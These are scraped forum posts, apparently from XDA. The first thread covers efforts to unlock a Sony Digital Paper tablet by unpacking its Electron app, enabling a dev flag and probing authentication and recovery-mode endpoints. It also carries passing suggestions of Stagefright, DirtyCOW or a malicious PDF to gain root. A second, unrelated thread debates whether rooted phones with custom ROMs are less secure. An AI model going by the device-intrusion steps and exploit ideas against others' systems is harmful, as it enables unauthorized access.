to
config.DEVBUILD = true;
After you finished your modifications you have pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
mcplectrum said:
I have found out some interesting stuff about the device with the help of the Digital Paper App.
The app is built using electron and there is a file: /Applications/Digital\ Paper\ App.app/Contents/Resources/app.asar
This file contains the electron javascript files, which handle all the communication with the device.
It can be extracted with: sudo asar extract app.asar output
(github_com/electron/asar)
This also requires node to be installed: with e.g. brew install node (changelog_com/posts/install-node-js-with-homebrew-on-os-x)
The app communicates with the device via Restlet-Framework/2.3.7 on port 8443 with tcp (no matter if it is the bluetooth, wifi or usb connection).
This is the only port that is open.
In the file: /Applications/Digital\ Paper\ App.app/Contents/Resources/output/node_modules/mw-error/lib/codeparams.js you can find all the relative paths, which are getting called during e.g. file transfer, firmware update and stuff.
Running the app and placing breakpoints reveals that before you can transfer files and stuff:
'/auth'
'/auth/nonce/'
are called in order to authenticate, which looks e.g. like url digitalpaper.local:8443/auth/nonce/1e9ee24d-6613-433a-9770-76b04333ac95
the last part of the call is the "client_id": "1e9ee24d-6613-433a-9770-76b04333ac95", which is retrieved via the url digitalpaper.local:8443/auth call.
digitalpaper.local:8443/auth/
Important:
In /Applications/Digital\ Paper\ App.app/Contents/Resources/output/lib/config.js
change the line
config.DEVBUILD = false;
to
config.DEVBUILD = true;
After you finished your modifications you have pack the output folder again:
sudo asar pack output app.asar
I did not have time to continue, but the following relative urls look promising (especially recovery_mode):
'/testmode/auth/nonce',
'/testmode/auth',
'/testmode/launch',
'/testmode/recovery_mode',
'/testmode/assets/{}',
Click to expand...
Click to collapse
Hope you get some result from wifi side. I also realized they use the port 8443 but couldn't get further as you.
For whom trying to hack it, here is the link for the already 'hacked' system apps (including the original files) - that of the famous hacked RP1 video. Inside the subfolder S1, there are also the hacked system apps for DPT-S1 just in case.
https://www.dropbox.com/sh/dvtvokdzrgwjc83/AACXOJA-E56nUpUfiWUOzrM3a?dl=0
George Malas said:
Does it have a web browser? Maybe you can utilize for example the Stagefright Exploit + DirtyC0W to get root.
Click to expand...
Click to collapse
The stock device has no web browser, no sd-card, no usb connection, and no typical system. I think SONY was haunted by some security issues maybe because they thought the major users are lawyers or very important people? lol
Any chance to create a buffer overflow PDF to attack RP1's pdf reader?
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
jess91 said:
I am unable to help, but wanted to let you know I am definitely interested in and supportive of this. If this device can be unlocked as suggested in that one youtube video then I would buy it, despite the steep price.
Click to expand...
Click to collapse
If you're interested and supportive of this then go buy one anyway and apply yourself to going forward figuring out how to get it done. Other than that, you're not supportive, you're just hopeful that someone figures it out and then you'll probably go get one.
DO NOT CONTACT ME VIA PM TO RECEIVE HELP, YOU WILL BE IGNORED. KEEP IT IN THE THREADS WHERE EVERYONE CAN SHARE
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This alread is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to adroid and that stuff.
Paderico said:
Hey guys,
I also recently got the RP1 and am also looking for ways to mod it. Big kudos and thanks to all of you for posting this! This alread is amazing. @sartrism: can you maybe give me a hint how to load the files on the rp1? Sorry if this might be a stupid question but I'm new to adroid and that stuff.
Click to expand...
Click to collapse
Just a little update from my side. I'm currently tryng to recreate the steps @mcplectrum was using. It seems that my RP1 also uses other ports. I tried to wireshark the USB and WiFi connection. By that I saw that often GET /registration/information is called for Host: localhost:58052. Moreover the first call is GET /register/serial_number also on port 5808. This was via USB.
Trying to trigger the /auth/ call via Telnet returns nothing unfortunately. But also the 8080 port is open. Trying to call digitalpaper.local:8443/auth/ returns nothing on firefox.
@mcplectrum: how did you get the client_id and what would one need that for?
I also tried to change the config.DEVBUILD to true but that seemed to change nothing at all.
So to sum up what we know:
The device is using some kind of android structure, the source code seems to use the uboot bootloader, all communication is done by a rest restlet framework. So actually there should be some kind of way to use the restlet framework to PUT or POST the modified files.
The other option would be directly flash the eMMC right? I would take the risk and just load it on my device and see what happens. Any hints on how to do that?

Security-related arguments for root and custom rom usage...

Exodus, a popular, albeit closed-source, crypto wallet app recently stopped working on my device. After a few days of back-and-forth troubleshooting via support, they somehow realized that my device is both rooted and running a custom, open source, community-supported ROM. They told me this was no longer allowed because it is far less secure than running the proprietary ROM. I countered with both personal testimony (back when I had a Blu phone, and a year later they got kicked off Amazon due to spyware streaming customer data out without consent) and common fact that OEM ROMs are almost always packed full of bloatware and spyware. I countered that installing a reputable open source ROM with only those apps I want and need is better. I argued that root gives me the ability to use AFWall to block outbound access to apps that I don't want having having access to the Internet without my permission. I could have argue that continuing to use a 1-2 year old phone that no longer receives security updates when I could use an open source ROM that does is better. I also provided a few public articles showing how frequently apps from the Play Store and other "OEM" stores are caught abusing their users' trust and performing malicious action. My point was that it's not correct to just automatically assume that having root and using a non-OEM ROM is less secure. That's a falsehood. But that said, I am interested to know what the XDA community thinks about that. And if the XDA community has any facts about custom, open source, community-supported ROMs being more secure than OEM ROMs, I am interested to further arm myself. And of course, I am completely willing to be instructed by the XDA community that indeed Exodus is right and using a custom ROM and having a rooted phone is completely, inherently, automatically more insecure than using an OEM ROM full of bloatware and spyware, not having root so that any rag-tag app can stream data back to home base, and falling behind with security patches because the vendor is either too slow to release or decides my device is no longer worth supporting.
You can't blame them for not troubleshooting unknown firmware. You changed the playing field.
Less mainstream use and support* is one of the disadvantages of custom roms and rooting.
I run stock and use other methods to kill bloatware. Zero brick risk, little down time and they run well.
I'm not saying don't root etc... but you knew the job was dangerous when you took it.
*this can have potentially far reaching and multifaceted implication$
@blackhawk I'm pretty sure it wasn't broken on my phone. One day I opened the app and it said I needed to update to continue using it. So I thought maybe the app just had failed to automatically update from the Play Store. But shortly thereafter I found it wouldn't update. That led to opening support ticket with them which eventually led to them saying it no longer works on rooted devices. Their argument was that they were attempting to protect me. My rebuttal was that I don't want their protection, I want my freedom back. They should focus on making their app as secure as possible and then, if they discover I am running it on a rooted phone, then give me a warning box and force me to accept it but don't just take away my freedom.
The irony of their stance is that they still provide the Linux program. And who doesn't have root access on their Linux computer? Or their Mac or Windows computer, for that matter? I can completely understand if they don't wish to troubleshoot the installation of the Debian package or even the use of the zip on every Linux version out there. I wouldn't either! But that's completely different than saying, "Oh, you have root access to your Linux/Mac/Windows computer? We can't let you use our program anymore." That makes zero sense, and it's the same nonsensical argument they are making for rooted Android phones.
I run stock N10+'s because they're easier to troubleshoot, maintain and it doesn't trip the Knox efuse. I have to add a package disabler and do some optimizing but it's child's play for me to do it at this point.
Unfortunately if you root you're going to have to suck it up and do the work needed to optimize it.
Same thing I do with stock but with more tools at your disposal... after the learning curve.
It's this learning curve, the chance of bricking and the damage that can be inadvertently done to the OS with no access restrictions are some of the downsides. Rooting takes time to learn and perfect. With unlimited power, blah, blah, blah.
I rather just do basic infrequent troubleshooting and have fun... my current load is over 1.5 yo, still fast and stable.
I don't update the firmware because that breaks things. No updates needed once you optimize it and find any needed work arounds... it's good to go. Anything from Pie up is pretty secure; they have some vulnerabilities but in practice this isn't an issue... unless you do something stupid.

Categories

Resources